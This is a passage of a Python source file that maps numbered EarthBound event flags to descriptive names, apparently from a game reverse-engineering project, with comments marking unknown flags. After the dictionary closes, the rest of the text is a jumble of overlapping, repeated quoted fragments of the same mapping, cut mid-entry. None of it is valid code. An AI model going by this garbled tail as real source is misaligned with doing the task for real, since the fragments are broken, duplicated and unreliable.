    543: 'SAILING_POST_KRAKEN_MUSIC',
    544: 'WINTERS_MUSIC',
    545: 'LAST_MELODY_AT_LILLIPUT_STEPS',
    546: 'LAST_MELODY_AT_MILKY_WELL',
    547: 'LAST_MELODY_AT_PINK_CLOUD',
    548: 'LAST_MELODY_AT_FIRE_SPRING',
    549: 'QUEUE_OUTSIDE_CHAOS_THEATER',
    550: 'GOT_SUPORMA',
    551: 'GAVE_FOOD_TO_APPLE_KID',
    552: 'GOT_ZOMBIE_PAPER',
    553: 'GOT_BACKSTAGE_PASS',
    554: 'GOT_YOGURT_DISPENSER',
    555: 'FOURSIDE_DEPT_LIGHTS_OUT',
    556: 'FOURSIDE_DEPT_BLACKOUT_JUST_ENDED',
    557: 'READY_TO_SAIL_TO_SCARABA',
    558: 'HIDE_ONETT_DRUGSTORE_TOWN_MAP',
    559: 'HIDE_ONETT_BURGER_SHOP_TOWN_MAP',
    560: 'HIDE_ONETT_HOTEL_TOWN_MAP',
    561: 'HIDE_ONETT_HOSPITAL_TOWN_MAP',
    562: 'HIDE_ONETT_BAKERY_TOWN_MAP',
    563: 'HIDE_ONETT_TO_TWOSON_TOWN_MAP',
    564: 'HIDE_TWOSON_HOTEL_TOWN_MAP',
    565: 'HIDE_TWOSON_DEPT_STORE_TOWN_MAP',
    566: 'HIDE_TWOSON_TO_ONETT_TOWN_MAP',
    567: 'HIDE_TWOSON_BUS_STOP_TOWN_MAP',
    568: 'HIDE_TWOSON_HOSPITAL_TOWN_MAP',
    569: 'HIDE_TWOSON_TO_THREED_TOWN_MAP',
    570: 'HIDE_THREED_DRUGSTORE_TOWN_MAP',
    571: 'HIDE_THREED_HOTEL_TOWN_MAP',
    # 572 (???)
    573: 'HIDE_THREED_BAKERY_TOWN_MAP',
    574: 'HIDE_THREED_HOSPITAL_TOWN_MAP',
    575: 'HIDE_FOURSIDE_HOSPITAL_TOWN_MAP',
    576: 'HIDE_FOURSIDE_DEPT_STORE_TOWN_MAP',
    577: 'HIDE_FOURSIDE_BAKERY_TOWN_MAP',
    578: 'HIDE_FOURSIDE_HOTEL_TOWN_MAP',
    579: 'HIDE_SCARABA_HOTEL_TOWN_MAP',
    580: 'HIDE_SCARABA_HOSPITAL_TOWN_MAP',
    581: 'HIDE_SCARABA_SHOP_TOWN_MAP',
    582: 'HIDE_SUMMERS_HOTEL_TOWN_MAP',
    583: 'HIDE_SUMMERS_RESTAURANT_TOWN_MAP',
    584: 'HIDE_SUMMERS_SHOP_TOWN_MAP',
    585: 'HIDE_SUMMERS_HOSPITAL_TOWN_MAP',
    586: 'HIDE_TOTO_SHOP_TOWN_MAP',
    587: 'FLYING_MAN_MUSIC',
    # 588 (Visibility flag for someone in Threed?)
    # 589 (Visibility flag for some Hotel Attendant?)
    590: 'HAPPY_THREED_PEOPLE',
    591: 'CHARRED_MONKEY_OUTSIDE_JACKIES_CAFE',  # TODO: CONFIRM
    592: 'MONKEY_OUTSIDE_JACKIES_CAFE',  # TODO: CONFIRM
    593: 'POO_TELEPORTING_TO_SUMMERS',
    594: 'BLOND_GUY_IN_FOURSIDE',  # TODO: CONFIRM
    595: 'STAR_MASTER_NEXT_TO_MU',
    # 596 (???)
    597: 'SHOP_SCARABA_BAZAAR_FOOD',
    598: 'SHOP_SCARABA_WATER',
    599: 'SHOP_SOUTH_SCARABA_VARIETY',
    600: 'SHOP_DEEP_DARKNESS_BUSINESSMAN',
    601: 'SHATTERED_MAN_1_DEFEATED',
    602: 'SHATTERED_MAN_2_DEFEATED',
    603: 'MINI_BARF_DEFEATED',
    604: 'GOT_KEY_TO_THE_LOCKER',
    605: 'USED_KEY_TO_THE_LOCKER',
    606: 'DUNGEON_MAN_OPEN',
    # 607 (Unknown. Related to desert mine?)
    608: 'DESERT_MINE_TO_EXPAND_NEXT_NIGHT',
    609: 'WINTERS_PENCIL_ERASED',
    610: 'DETECTIVE_IN_THREED',
    # 611 (Something about talking to Paula's dad and not talking to Everdred)
    612: 'EVERDRED_NOT_AT_ROOF',
    613: 'TELEPORT_MONKEY_NOT_AT_CAVE',
    614: 'TELEPORT_MONKEY_NEAR_MONKEY_CAVE_ENTRANCE',
    615: 'TELEPORT_MONKEY_NEAR_DESERT_ROAD',
    616: 'TENDAKRAUT_STOLEN',
    617: 'MAGIC_CAKE_LADY_AT_BEACH',
    618: 'GOT_ERASER_ERASER',
    # 619
    620: 'APPLE_MOUSE_AT_WINTERS_LAB',
    621: 'MONKEYS_AT_WINTERS_LAB',
    622: 'BUBBLE_MONKEYS_WIFE_AT_WINTERS',
    623: 'PUNK_GUY_OUTSIDE_HIS_HOUSE_THREED',
    624: 'EVERDRED_AT_HIS_HOUSE',
    # 625 (Something about "Fancy Pokey" in the Monotoli Building) -- Got kicked out of Pokey's Room in the Monotoli Building?
    626: 'MEN_ABOUT_TO_ENTER_CIRCUS_TENT',
    627: 'TRACY_HAS_SOUND_STONE',
    628: 'PRESENTS_AT_SATURN_VALLEY',
    629: 'PARTY_IS_DIRTY_FROM_BELCH_FIGHT',
    630: 'BUBBLE_MONKEY_AT_LAKE_TESS',
    631: 'TALKED_TO_MOONSIDE_MONOTOLI',
    632: 'MONSTERS_IN_ONETT',
    633: 'LIERS_HOUSE_UNLOCKED',
    634: 'PAULA_TELEPATHY_DREAM_1',
    635: 'PAULA_TELEPATHY_DREAM_2',
    636: 'PAULA_TELEPATHY_DREAM_JEFF',
    640: 'HIDE_FOURSIDE_TO_DESERT_TOWN_MAP',
    641: 'HIDE_THREED_TO_DESERT_TOWN_MAP',
    642: 'HIDE_THREED_TO_TWOSON_TOWN_MAP',
    643: 'READY_TO_LOOK_AT_PHOTO_ALBUM',
    644: 'GOT_SATURN_RIBBON',
    645: 'ESCARGO_EXPRESS_PICK_UP',
    646: 'FOR_SALE_SIGN_CUSTOMER_2',
    647: 'FOR_SALE_SIGN_CUSTOMER_3',
    648: 'FOR_SALE_SIGN_CUSTOMER_4',
    649: 'TALKED_TO_ROCK_BELOW_TENDA_VILALGE',
    650: 'GOT_MONKEYS_LOVE',
    651: 'UNDERWORLD_TENDA_GATE_OPEN',
    652: 'USED_CARROT_KEY',
    653: 'SHOP_DEEP_DARKNESS_ARMS_DEALER',
    654: 'DEEP_DARKNESS_BUSINESSMAN_PAID_DOCTORS_FEE',
    655: 'SKY_RUNNER_MUSIC',
    656: 'ALT_BUY_SOUND_EFFECT',
    657: 'BOUGHT_OR_SOLD_AT_SHOP',
    658: 'BOUGHT_WEAPON',
    659: 'MOONSIDE_SWITCH_YES_NO',
    664: 'TREMBLING_MONOTOLI_AT_48TH_FLOOR_ABSENT',
    665: 'GOT_LETTER_FROM_MOM',
    666: 'GOT_LETTER_FROM_TONY',
    667: 'GOT_LETTER_FROM_KIDS',
    668: 'TALKED_TO_MONTAGUE_AT_SATURN_VALLEY_BEFORE_MAGICANT',
    669: 'FLY_HONEY_TRASH_CAN_VISIBLE',
    670: 'GOT_FOR_SALE_SIGN',
    # 671 (???)
    672: 'POKEY_FLIES_AWAY_BY_HELICOPTER',
    673: 'HIDE_TWOSON_BURGLIN_BAKERY_TOWN_MAP',
    674: 'HIDE_SCARABA_FOOD_TOWN_MAP',
    675: 'MACH_PIZZA_ZOMBIE_PAPER_DELIVERY',
    676: 'HIDE_THREED_BUS_STOP_1_TOWN_MAP',
    677: 'HIDE_THREED_BUS_STOP_2_TOWN_MAP',
    678: 'HIDE_FOURSIDE_BUS_STOP_TOWN_MAP',
    # 679 (Something about Venus show about to start?)
    # 680 (Something about Venus show about to start?)
    681: 'SHOW_ONETT_HINT_TOWN_MAP',
    682: 'SHOW_TWOSON_HINT_TOWN_MAP',
    683: 'SHOW_THREED_HINT_TOWN_MAP',
    684: 'SHOW_FOURSIDE_HINT_TOWN_MAP',
    685: 'SHOW_SUMMERS_HINT_TOWN_MAP',
    686: 'SHOW_SCARABA_HINT_TOWN_MAP',
    687: 'SCARABA_CULTURAL_MUSEUM_PHONE_RINGING',
    688: 'HAS_CALLED_MOM',
    689: 'HAS_CALLED_MOM_AFTER_RESCUING_PAULA',
    690: 'PAULA_KIDNAPPED_WITH_PENCIL_ERASER',
    691: 'POO_LEFT_WITH_HAWK_EYE',
    692: 'ESCARGO_EXPRESS_HAS_PAULAS_PENCIL_ERASER',
    693: 'ESCARGO_EXPRESS_HAS_POOS_HAWK_EYE',
    694: 'ESCARGO_EXPRESS_PENCIL_ERASER_DELIVERY',
    695: 'ESCARGO_EXPRESS_HAWK_EYE_DELIVERY',
    696: 'RANDOM_JEFF_ITEM_FIX_CHANCE',
    697: 'SHARK_AT_ARCADE_UPSTAIRS_DEFEATED',
    698: 'GOT_PHOTO_NESS_HOUSE',
    699: 'GOT_PHOTO_SCAM_HOUSE',
    700: 'GOT_PHOTO_CYCLE_SHOP',
    701: 'GOT_PHOTO_PEACEFUL_REST_VALLEY',
    702: 'GOT_PHOTO_HAPPY_HAPPY_CABIN',
    703: 'GOT_PHOTO_CHAOS_THEATER',
    704: 'GOT_PHOTO_LAKE_TESS',
    705: 'GOT_PHOTO_BRICK_ROAD_DUNGEON',
    706: 'GOT_PHOTO_THREED_CEMETERY',
    707: 'GOT_PHOTO_GRAPEFRUIT_FALLS',
    708: 'GOT_PHOTO_SATURN_VALLEY_COFFEE',
    709: 'GOT_PHOTO_CIRCUS_TENT',
    710: 'GOT_PHOTO_BLACK_SESAME_SEED',
    711: 'GOT_PHOTO_DESERT_MINE',
    712: 'GOT_PHOTO_FOURSIDE_BRIDGE',
    713: 'GOT_PHOTO_FOURSIDE_MUSEUM_OUTSIDE',
    714: 'GOT_PHOTO_FOURSIDE_MUSEUM_INSIDE',
    715: 'GOT_PHOTO_MONOTOLI_BUILDING',
    716: 'GOT_PHOTO_FOURSIDE_DEPT_STORE',
    717: 'GOT_PHOTO_POOS_PALACE_INSIDE',
    718: 'GOT_PHOTO_POOS_PALACE_OUTSIDE',
    719: 'GOT_PHOTO_STONEHENGE',
    720: 'GOT_PHOTO_SUMMERS_HOTEL',
    721: 'GOT_PHOTO_FOURSIDE_RESTAURANT',
    722: 'GOT_PHOTO_SUMMERS_BEACH',
    723: 'GOT_PHOTO_TOTO',
    724: 'GOT_PHOTO_SCARABA_BAZAAR',
    725: 'GOT_PHOTO_PYRAMID',
    726: 'GOT_PHOTO_SCARABA_OASIS',
    727: 'GOT_PHOTO_DEEP_DARKNESS',
    728: 'GOT_PHOTO_TENDA_VILLAGE',
    729: 'GOT_PHOTO_SATURN_VALLEY_FINAL',
    730: 'TALKED_TO_ONETT_BAKERY_LADY_TWICE',
    731: 'SHOP_UNDERWORLD_TENDA',
    732: 'SHOP_MAGICANT',
    733: 'SHOP_MOONSIDE',
    734: 'ONETT_HOSPITAL_PATIENT_OWNER_JOKE',
    735: 'TALKED_TO_SMASH_WOUND_GIRLS_MOTHER',
    736: 'GOT_PAIR_OF_DIRTY_SOCKS',
    737: 'TALKED_TO_TWOSON_HOTEL_GUY_AT_TABLE_NINE_TIMES',
    738: 'GOT_MONEY_FROM_TWOSON_HOTEL_GUY_AT_TABLE',
    739: 'PAULAS_DAD_RAN_IN_FRONT_OF_TWOSON_HOTEL',
    740: 'PEOPLE_IN_THREED_ABSENT',
    741: 'MONOTOLI_AT_48TH_FLOOR',
    742: 'LARDNA_AT_HOME',
    743: 'VISITED_HAPPY_HAPPY_VILLAGE',
    744: 'TALKED_TO_CARPAINTER',
    745: 'QUEST_TO_YOGURT_MACHINE',
    746: 'SCAM_HOUSE_UNLOCKED',
    # 747 (??? Something about Runaway Five Tour Bus???)
    748: 'SKY_RUNNER_AT_WINTERS_LAB',
    749: 'NESS_WEARING_PAJAMAS',
    750: 'LEFT_HOME_AT_LEAST_ONCE',
    751: 'CHAOS_THEATER_AUDIENCE_ABSENT',
    752: 'HINT_GUY_ABSENT',
    753: 'NESS_HOUSE_PHONE_RINGING',
    754: 'PREVENT_TELEPORT',
    755: 'GOT_INSIGNIFICANT_ITEM',
    756: 'DUNGEON_MAN_IN_PARTY',
    757: 'GEORGE_HAS_DIAMOND',
    758: 'GOING_TO_MAGICANT_MUSIC',
    759: 'VENUS_AND_RUNAWAY_FANS_AT_TOPOLLA',  # Visibility flag for NPCs #851 and #852
    760: 'PHASE_DISTORTER_MUSIC',
    # 761 (Unknown. Set when arriving in Threed, cleared when defeating Belch)
    762: 'DUNGEON_MAN_GOODBYE_EXIT_SIGN',
    763: 'PICKY_KNOCKING_ON_DOOR',
    764: 'READY_TO_LEARN_TELEPORT',
    765: 'LEARNED_PHASE_DISTORTER_V2_FUNCTIONS',
    # 769 (Checked when you talk to Tracy after defeating Giygas, but never set)
    770: 'LAST_ESCARGO_EXPRESS_CALL',
    # 771 (???)
    772: 'LAST_DAD_CALL',
    773: 'NERDY_GUY_AND_FAT_GUY_AT_CIRCUS_TENT',  # Visibility flags for NPCs #457 and #459
    774: 'TALKED_TO_MOONSIDE_SAILOR_MAN',
    # 775 (Can't get calls from Dad?)
    776: 'PAULA_AT_MONOTOLI_BUILDING',
    777: 'GOT_SYNESS_BOOK_BACK_FROM_TENDA',
    778: 'EXIT_MOUSE_ASLEEP',
    # 779 (Related to PREVENT_TELEPORT?)
    # 780 (If set, Maxwell doesn't actually save your game. WHAT?)
    805: 'PRESENT_CRACKED_BAT',
    829: 'PRESENT_TONY_COOKIE_1',
    830: 'PRESENT_TONY_COOKIE_2',
    831: 'PRESENT_TONY_COOKIE_3',
    832: 'PRESENT_TONY_COOKIE_4',
    833: 'PRESENT_TONY_COOKIE_5',
    834: 'PRESENT_TONY_COOKIE_6',
}
468: 'POKEYS_HOUSE_LOCKED', 469: 'POLICE_AT_METEORITE',", "766: 'EXIT_MOUSE_DISAGREEABLE', 767: 'LEARNED_ABOUT_UNDERWORLD_GEYSERS', 768: 'PAID_MUSEUM_ENTRANCE_FEE', # 769 (Checked when you talk to", "530: 'TRACY_NOT_AT_HER_ROOM', 531: 'TRACY_DOWNSTAIRS', 532: 'NESS_ROOM_METEORITE_FALLING_MUSIC', 533: 'NESS_ROOM_METEORITE_CRASH_MUSIC', 534: 'CITY_BUS_MUSIC', 535: 'RUNAWAY_BUS_OR_SKY_RUNNER_FALLING_MUSIC', 536:", "'MINI_BARF_DEFEATED', 604: 'GOT_KEY_TO_THE_LOCKER', 605: 'USED_KEY_TO_THE_LOCKER', 606: 'DUNGEON_MAN_OPEN', # 607 (Unknown. Related to desert", "369: 'CAN_ENTER_BELCHS_FACTORY', # 370 (Unknown. Related to traffic jam?) # 371 (???) 372:", "# 679 (Something about Venus show about to start?) # 680 (Something about", "497: 'PHOTO_FOURSIDE_DEPT_STORE_AVAILABLE', 498: 'PHOTO_POOS_PALACE_INSIDE_AVAILABLE', 499: 'PHOTO_POOS_PALACE_OUTSIDE_AVAILABLE', 500: 'PHOTO_STONEHENGE_AVAILABLE', 501: 'PHOTO_SUMMERS_HOTEL_AVAILABLE', 502: 'PHOTO_FOURSIDE_RESTAURANT_AVAILABLE', 503:", "585: 'HIDE_SUMMERS_HOSPITAL_TOWN_MAP', 586: 'HIDE_TOTO_SHOP_TOWN_MAP', 587: 'FLYING_MAN_MUSIC', # 588 (Visibility flag for someone in", "'SHOP_SATURN_CONSUMABLES', 251: 'SHOP_DESERT_DRUGSTORE_EQUIPMENT', 252: 'SHOP_DESERT_DRUGSTORE_CONSUMABLES', 253: 'SHOP_DESERT_MINE', 254: 'SHOP_DESERT_ARMS_DEALER', 255: 'SHOP_FOURSIDE_BAKERY', 256: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_EQUIPMENT',", "563: 'HIDE_ONETT_TO_TWOSON_TOWN_MAP', 564: 'HIDE_TWOSON_HOTEL_TOWN_MAP', 565: 'HIDE_TWOSON_DEPT_STORE_TOWN_MAP', 566: 'HIDE_TWOSON_TO_ONETT_TOWN_MAP', 567: 'HIDE_TWOSON_BUS_STOP_TOWN_MAP', 568: 'HIDE_TWOSON_HOSPITAL_TOWN_MAP', 569:", "178: 'HEALER_RESTORE_FEELING', 179: 'LARGE_PIZZA_DELIVERY', 180: 'PIZZA_DELIVERY', 181: 'ESCARGO_EXPRESS_DELIVERY', 182: 'GOT_MELODY_GIANT_STEP', 183: 'GOT_MELODY_LILLIPUT_STEPS', 184:", "339: 'APPLE_KID_NOT_AT_HIS_HOUSE', # 340 (???) 341: 'RECEIVED_APPLE_KID_CALL_ABOUT_PENCIL_ERASER', 342: 'PYRAMID_OPEN', 343: 'GOT_HIEROGLYPH_COPY', 344: 'LAKE_TESS_WIND_BLOWING',", "(I hate multipurpose flags) # 227 (I hate multipurpose flags) # 228 (I", "763: 'PICKY_KNOCKING_ON_DOOR', 764: 'READY_TO_LEARN_TELEPORT', 765: 'LEARNED_PHASE_DISTORTER_V2_FUNCTIONS', 766: 'EXIT_MOUSE_DISAGREEABLE', 767: 'LEARNED_ABOUT_UNDERWORLD_GEYSERS', 768: 'PAID_MUSEUM_ENTRANCE_FEE', #", "'BRICK_ROAD_DUNGEON_PROTOPLASM_1_DEFEATED', 419: 'BRICK_ROAD_DUNGEON_PROTOPLASM_2_DEFEATED', 420: 'BRICK_ROAD_DUNGEON_MOUSE_1_DEFEATED', 421: 'BRICK_ROAD_DUNGEON_MOUSE_2_DEFEATED', 422: 'ONETT_DAYTIME', 423: 'UNDERWORLD_TALKING_ROCK_STOPPED_TALKING', 424: 'TENDA_SHOP_PLAIN_ROLL_1',", "'TALKED_TO_DYING_EVERDRED', 146: 'RUNAWAY_FIVE_FREE_FROM_TOPOLLA_THEATER', # 147 (Venus at Topolla?) 148: 'READ_HIEROGLYPHS', 149: 'POO_STARTS_HIS_JOURNEY', #", "717: 'GOT_PHOTO_POOS_PALACE_INSIDE', 718: 'GOT_PHOTO_POOS_PALACE_OUTSIDE', 719: 'GOT_PHOTO_STONEHENGE', 720: 'GOT_PHOTO_SUMMERS_HOTEL', 721: 'GOT_PHOTO_FOURSIDE_RESTAURANT', 722: 'GOT_PHOTO_SUMMERS_BEACH', 723:", "'TELEPORT_MONKEY_NEAR_DESERT_ROAD', 616: 'TENDAKRAUT_STOLEN', 617: 'MAGIC_CAKE_LADY_AT_BEACH', 618: 'GOT_ERASER_ERASER', # 619 (Unkonwn. 
Related to Stonehenge", "'APPLE_MOUSE_AT_WINTERS_LAB', 621: 'MONKEYS_AT_WINTERS_LAB', 622: 'BUBBLE_MONKEYS_WIFE_AT_WINTERS', 623: 'PUNK_GUY_OUTSIDE_HIS_HOUSE_THREED', 624: 'EVERDRED_AT_HIS_HOUSE', # 625 (Something about", "701: 'GOT_PHOTO_PEACEFUL_REST_VALLEY', 702: 'GOT_PHOTO_HAPPY_HAPPY_CABIN', 703: 'GOT_PHOTO_CHAOS_THEATER', 704: 'GOT_PHOTO_LAKE_TESS', 705: 'GOT_PHOTO_BRICK_ROAD_DUNGEON', 706: 'GOT_PHOTO_THREED_CEMETERY', 707:", "188: 'GOT_MELODY_LUMINE_HALL', 189: 'GOT_MELODY_FIRE_SPRING', 190: 'CONQUERED_SANCTUARY_1', 191: 'CONQUERED_SANCTUARY_2', 192: 'CONQUERED_SANCTUARY_4', 193: 'CONQUERED_SANCTUARY_3', 194:", "242: 'SHOP_THREED_DRUGSTORE_CONSUMABLES', 243: 'SHOP_THREED_ARMS_DEALER', 244: 'SHOP_THREED_BAKERY', 245: 'SHOP_WINTERS_DRUGSTORE', 246: 'SHOP_LAB_CAVE_BOY', 247: 'SHOP_GRAPEFRUIT_FALLS', 248:", "591: 'CHARRED_MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM 592: 'MONKEY_OUTSIDE_JACKIES_CAFE', # TODO: CONFIRM 593: 'POO_TELEPORTING_TO_SUMMERS', 594:", "'PATH_TO_MANI_MANI_OPEN', 64: 'FRANKYSTEIN_MKII_DEFEATED', # 65 (???) 66: 'EVERDRED_DEFEATED', 67: 'FOOD_STAND_MONITOR_DEFEATED', 68: 'CARPAINTER_DEFEATED', 69:", "(Unknown. Related to desert mine?) 608: 'DESERT_MINE_TO_EXPAND_NEXT_NIGHT', 609: 'WINTERS_PENCIL_ERASED', 610: 'DETECTIVE_IN_THREED', # 611", "417: 'BRICK_ROAD_DUNGEON_DUCK_2_DEFEATED', 418: 'BRICK_ROAD_DUNGEON_PROTOPLASM_1_DEFEATED', 419: 'BRICK_ROAD_DUNGEON_PROTOPLASM_2_DEFEATED', 420: 'BRICK_ROAD_DUNGEON_MOUSE_1_DEFEATED', 421: 'BRICK_ROAD_DUNGEON_MOUSE_2_DEFEATED', 422: 'ONETT_DAYTIME', 423:", "695: 'ESCARGO_EXPRESS_HAWK_EYE_DELIVERY', 696: 'RANDOM_JEFF_ITEM_FIX_CHANCE', 697: 'SHARK_AT_ARCADE_UPSTAIRS_DEFEATED', 698: 'GOT_PHOTO_NESS_HOUSE', 699: 'GOT_PHOTO_SCAM_HOUSE', 700: 'GOT_PHOTO_CYCLE_SHOP', 701:", "'SHOP_HH_DRUGSTORE_EQUIPMENT', 241: 'SHOP_THREED_DRUGSTORE_EQUIPMENT', 242: 'SHOP_THREED_DRUGSTORE_CONSUMABLES', 243: 'SHOP_THREED_ARMS_DEALER', 244: 'SHOP_THREED_BAKERY', 245: 'SHOP_WINTERS_DRUGSTORE', 246: 'SHOP_LAB_CAVE_BOY',", "'POO_LEFT_WITH_HAWK_EYE', 692: 'ESCARGO_EXPRESS_HAS_PAULAS_PENCIL_ERASER', 693: 'ESCARGO_EXPRESS_HAS_POOS_HAWK_EYE', 694: 'ESCARGO_EXPRESS_PENCIL_ERASER_DELIVERY', 695: 'ESCARGO_EXPRESS_HAWK_EYE_DELIVERY', 696: 'RANDOM_JEFF_ITEM_FIX_CHANCE', 697: 'SHARK_AT_ARCADE_UPSTAIRS_DEFEATED',", "'PAULAS_PARENTS_KNOW_ABOUT_HH_RESCUE', 13: 'PAULA_JOINS', 14: 'JEFF_JOINS', 15: 'MONSTERS_IN_WINTERS', 16: 'POO_JOINS', 17: 'POO_LEARNING_STARSTORM', 18: 'BUZZ_BUZZ_IN_PARTY',", "205: 'FLYING_MAN_2_DEAD', 206: 'FLYING_MAN_3_DEAD', 207: 'FLYING_MAN_4_DEAD', 208: 'FLYING_MAN_5_DEAD', 209: 'VISITED_ONETT', 210: 'VISITED_TWOSON', 211:", "622: 'BUBBLE_MONKEYS_WIFE_AT_WINTERS', 623: 'PUNK_GUY_OUTSIDE_HIS_HOUSE_THREED', 624: 'EVERDRED_AT_HIS_HOUSE', # 625 (Something about \"Fancy Pokey\" in", "'SHOW_THREED_HINT_TOWN_MAP', 684: 'SHOW_FOURSIDE_HINT_TOWN_MAP', 685: 'SHOW_SUMMERS_HINT_TOWN_MAP', 686: 'SHOW_SCARABA_HINT_TOWN_MAP', 687: 'SCARABA_CULTURAL_MUSEUM_PHONE_RINGING', 688: 'HAS_CALLED_MOM', 689: 'HAS_CALLED_MOM_AFTER_RESCUING_PAULA',", "'SHOPPED_AT_FOOD_STAND', 121: 'DID_NOT_PAY_FOOD_STAND', 122: 'CARPAINTER_HAS_KEY', 123: 'BLUE_COW_ALT_TEXT', 124: 'ZOMBIE_PAPER_ON_TENT', 125: 'ZOMBIES_ON_TENT_FLOOR', 126: 'LEARNED_ABOUT_SHYNESS_BOOK',", "666: 'GOT_LETTER_FROM_TONY', 667: 'GOT_LETTER_FROM_KIDS', 668: 'TALKED_TO_MONTAGUE_AT_SATURN_VALLEY_BEFORE_MAGICANT', 669: 'FLY_HONEY_TRASH_CAN_VISIBLE', 670: 'GOT_FOR_SALE_SIGN', # 671 (???)", "beginning of expanded mine?) # 55 (Also related to Montague... AND STONEHENGE??) 
#", "587: 'FLYING_MAN_MUSIC', # 588 (Visibility flag for someone in Threed?) # 589 (Visibility", "478: 'SHOP_SCARABA_CONDIMENTS', 479: 'PHOTO_NESS_HOUSE_AVAILABLE', 480: 'PHOTO_SCAM_HOUSE_AVAILABLE', 481: 'PHOTO_CYCLE_SHOP_AVAILABLE', 482: 'PHOTO_PEACEFUL_REST_VALLEY_AVAILABLE', 483: 'PHOTO_HAPPY_HAPPY_CABIN_AVAILABLE', 484:", "'SAILING_POST_KRAKEN_MUSIC', 544: 'WINTERS_MUSIC', 545: 'LAST_MELODY_AT_LILLIPUT_STEPS', 546: 'LAST_MELODY_AT_MILKY_WELL', 547: 'LAST_MELODY_AT_PINK_CLOUD', 548: 'LAST_MELODY_AT_FIRE_SPRING', 549: 'QUEUE_OUTSIDE_CHAOS_THEATER',", "'TRAFFIC_JAM_CLEARED', 137: 'GAVE_FOOD_TO_MONTAGUE', 138: 'TALKED_TO_WHITE_SESAME_SEED', 139: 'DEPT_STORE_SPOOK_DEFEATED', # TODO: Confirm 140: 'QUEST_TO_VENUS_AUTOGRAPH', 141:", "multipurpose flags) 234: 'SHOP_TWOSON_DEPT_3RD_FLOOR_WOMAN', 235: 'SHOP_BURGLIN_PARK_JAMAICAN', 236: 'SHOP_BURGLIN_PARK_BAKERY', 237: 'SHOP_BURGLIN_PARK_CONDIMENTS', 238: 'SHOP_BURGLIN_PARK_BANANA_LADY', 239:", "Five Bus?) 315: 'GHOSTS_BLOCKING_TWOSON', # 316 (Unknown. Something about the City Bus?) 317:", "542: 'SAILING_OR_SUBMARINE_MUSIC', 543: 'SAILING_POST_KRAKEN_MUSIC', 544: 'WINTERS_MUSIC', 545: 'LAST_MELODY_AT_LILLIPUT_STEPS', 546: 'LAST_MELODY_AT_MILKY_WELL', 547: 'LAST_MELODY_AT_PINK_CLOUD', 548:", "233 (I hate multipurpose flags) 234: 'SHOP_TWOSON_DEPT_3RD_FLOOR_WOMAN', 235: 'SHOP_BURGLIN_PARK_JAMAICAN', 236: 'SHOP_BURGLIN_PARK_BAKERY', 237: 'SHOP_BURGLIN_PARK_CONDIMENTS',", "Bulldozer at Fourside Bridge?) 145: 'TALKED_TO_DYING_EVERDRED', 146: 'RUNAWAY_FIVE_FREE_FROM_TOPOLLA_THEATER', # 147 (Venus at Topolla?)", "'TALKED_TO_MOM', 472: 'TALKED_TO_POKEY_AT_METEORITE', 473: 'TRACY_AT_HALLWAY', 474: 'NESS_MOM_OUTSIDE', # 475 (Handles continue yes/no on", "'GOT_TOWN_MAP', 512: 'HAS_EXIT_MOUSE', 513: 'ONETT_POST_METEORITE_MUSIC', 514: 'JUST_RESTED_AT_HOME', 515: 'FRANK_DEFEATED', 516: 'MONKEY_CAVE_PENCIL_ERASED', 517: 'NESS_ROOM_LIGHTS_ON',", "675: 'MACH_PIZZA_ZOMBIE_PAPER_DELIVERY', 676: 'HIDE_THREED_BUS_STOP_1_TOWN_MAP', 677: 'HIDE_THREED_BUS_STOP_2_TOWN_MAP', 678: 'HIDE_FOURSIDE_BUS_STOP_TOWN_MAP', # 679 (Something about Venus", "(If set, Maxwell doesn't actually save your game. WHAT?) 805: 'PRESENT_CRACKED_BAT', 829: 'PRESENT_TONY_COOKIE_1',", "558: 'HIDE_ONETT_DRUGSTORE_TOWN_MAP', 559: 'HIDE_ONETT_BURGER_SHOP_TOWN_MAP', 560: 'HIDE_ONETT_HOTEL_TOWN_MAP', 561: 'HIDE_ONETT_HOSPITAL_TOWN_MAP', 562: 'HIDE_ONETT_BAKERY_TOWN_MAP', 563: 'HIDE_ONETT_TO_TWOSON_TOWN_MAP', 564:", "'GOT_MELODY_MAGNET_HILL', 187: 'GOT_MELODY_PINK_CLOUD', 188: 'GOT_MELODY_LUMINE_HALL', 189: 'GOT_MELODY_FIRE_SPRING', 190: 'CONQUERED_SANCTUARY_1', 191: 'CONQUERED_SANCTUARY_2', 192: 'CONQUERED_SANCTUARY_4',", "'SHOP_BURGLIN_PARK_BANANA_LADY', 239: 'SHOP_HH_DRUGSTORE_CONSUMABLES', 240: 'SHOP_HH_DRUGSTORE_EQUIPMENT', 241: 'SHOP_THREED_DRUGSTORE_EQUIPMENT', 242: 'SHOP_THREED_DRUGSTORE_CONSUMABLES', 243: 'SHOP_THREED_ARMS_DEALER', 244: 'SHOP_THREED_BAKERY',", "Paula's Dad acknowledging the kidnapping) 322: 'PAULAS_DAD_NOTICED_SHES_NOT_HOME', 323: 'GOT_PAK_OF_BUBBLE_GUM', 324: 'SHOP_RED_SNAKE', 325: 'SHOP_SCARABA_BAZAAR_EQUIPMENT',", "342: 'PYRAMID_OPEN', 343: 'GOT_HIEROGLYPH_COPY', 344: 'LAKE_TESS_WIND_BLOWING', # 345 (Related to Lake Tess. 
This", "363: 'SHARK_OUTSIDE_ARCADE_1_DEFEATED', 364: 'SHARK_OUTSIDE_ARCADE_2_DEFEATED', 365: 'SHARK_AT_ARCADE_ABSENT', 366: 'SLIMY_LITTLE_PILE_1_DEFEATED_AND_THREED_BLOND_GUY_BY_TENT_ABSENT', 367: 'SLIMY_LITTLE_PILE_2_DEFEATED', 368: 'SLIMY_LITTLE_PILE_3_DEFEATED', 369:", "'TWOSON_DEPT_MAN', 115: 'CHAOS_THEATER_BACKSTAGE_OPEN', 116: 'ORANGE_KID_ALT_TEXT', 117: 'INVESTED_IN_ORANGE_KID', 118: 'PAULAS_DAD_OUTSIDE', 119: 'RUNAWAY_FIVE_FREE_FROM_CHAOS_THEATER', 120: 'SHOPPED_AT_FOOD_STAND',", "'LEARNED_ABOUT_UNDERWORLD_GEYSERS', 768: 'PAID_MUSEUM_ENTRANCE_FEE', # 769 (Checked when you talk to Tracy after defeating", "first Hieroglyph Guardian doesn't reference this flag and never fights you 391: 'GUARDIAN_HIEROGLYPH_2_DEFEATED',", "426: 'TENDA_SHOP_PLAIN_ROLL_2', 427: 'TENDA_SHOP_SPICY_JERKY', 428: 'TENDA_SHOP_BAG_OF_DRAGONITE', 429: 'TENDA_SHOP_TALISMAN_COIN', 430: 'TENDA_SHOP_HALL_OF_FAME_BAT', # 431 